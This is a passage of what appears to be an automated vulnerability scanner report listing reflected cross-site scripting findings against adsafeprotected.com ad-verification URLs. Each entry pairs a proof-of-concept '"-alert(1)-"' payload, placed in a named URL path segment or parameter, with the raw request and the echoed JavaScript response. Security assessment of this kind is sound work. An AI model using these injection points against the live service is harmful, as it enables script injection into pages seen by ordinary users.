Set-Cookie: JSESSIONID=11B64D8D9D272DE8A43EFE7C4D5C852F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:27 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com21a5b"-alert(1)-"cf6c3bde548/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "30
...[SNIP]...

2.40. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b25cf"-alert(1)-"a31adad7d99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736b25cf"-alert(1)-"a31adad7d99/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3D9E116716B31F26EB9E0256A2AECFB4; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736b25cf"-alert(1)-"a31adad7d99/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   
...[SNIP]...

2.41. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdd46"-alert(1)-"c6cd25a3354 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003bdd46"-alert(1)-"c6cd25a3354/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7A81A0864A745D379F44373497C459F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:27 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003bdd46"-alert(1)-"c6cd25a3354/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killP
...[SNIP]...

2.42. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eef7"-alert(1)-"1d88e456200 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca3eef7"-alert(1)-"1d88e456200?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=539BEF821B32F03F7864DA8C43B8EB3C; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:27 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca3eef7"-alert(1)-"1d88e456200?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhra
...[SNIP]...

2.43. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81099"-alert(1)-"c11bf68dfae was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp0281099"-alert(1)-"c11bf68dfae&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B9C15A61E5DE496D1856F47CA2AF9D91; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp0281099"-alert(1)-"c11bf68dfae&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid :
...[SNIP]...

2.44. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77053"-alert(1)-"66938031c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster77053"-alert(1)-"66938031c38&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0C9E27AE0A1A8CE55C6C997B4A1CB1CA; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster77053"-alert(1)-"66938031c38&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ejjz"
};


(function()
...[SNIP]...

2.45. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54890"-alert(1)-"132ffc34b47 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=7218670554890"-alert(1)-"132ffc34b47&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F76C28019C0B902E488281B56C58A584; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=7218670554890"-alert(1)-"132ffc34b47&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ej4x"
};
...[SNIP]...

2.46. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1487a"-alert(1)-"7e0b3b23f54 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=6001487a"-alert(1)-"7e0b3b23f54&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FBF5954A26F5D03F6085B2EC13D8F0DF; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=6001487a"-alert(1)-"7e0b3b23f54&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0eju8"
};


(function(){var O="3.13
...[SNIP]...

2.47. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the js request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbc1f"-alert(1)-"4fc8df959c1 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10fbc1f"-alert(1)-"4fc8df959c1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFB5C4265780750837806A89B2B0B812; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10fbc1f"-alert(1)-"4fc8df959c1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ejw1"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

2.48. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0cbc"-alert(1)-"817e5b6934b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10&f0cbc"-alert(1)-"817e5b6934b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10&f0cbc"-alert(1)-"817e5b6934b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ekaf"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

2.49. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb9a7"-alert(1)-"910b8bf640d was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01bb9a7"-alert(1)-"910b8bf640d&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0804C1A00E565ECBE0A9E02DA2A4CE2F; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:24 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01bb9a7"-alert(1)-"910b8bf640d&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
...[SNIP]...

2.50. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e3"-alert(1)-"d0ecdf8d0fd was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tlf40e3"-alert(1)-"d0ecdf8d0fd&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=51394304C5191E0560BE30CA720D99CC; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tlf40e3"-alert(1)-"d0ecdf8d0fd&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ejsm"
};


(function(){var O="3.13.1";var
...[SNIP]...

2.51. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45685"-alert(1)-"e066e44082e was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=16045685"-alert(1)-"e066e44082e&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0AD7A3C7C2D8D6EB41AF3CA6593E2046; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=16045685"-alert(1)-"e066e44082e&h=600&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ejlp"
};


(function(){var O=
...[SNIP]...

2.52. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72461"-alert(1)-"68fd0dd1600 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc72461"-alert(1)-"68fd0dd1600/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8A6B259E16FBA90FC9313AAB1BDF8F6A; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:14:25 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
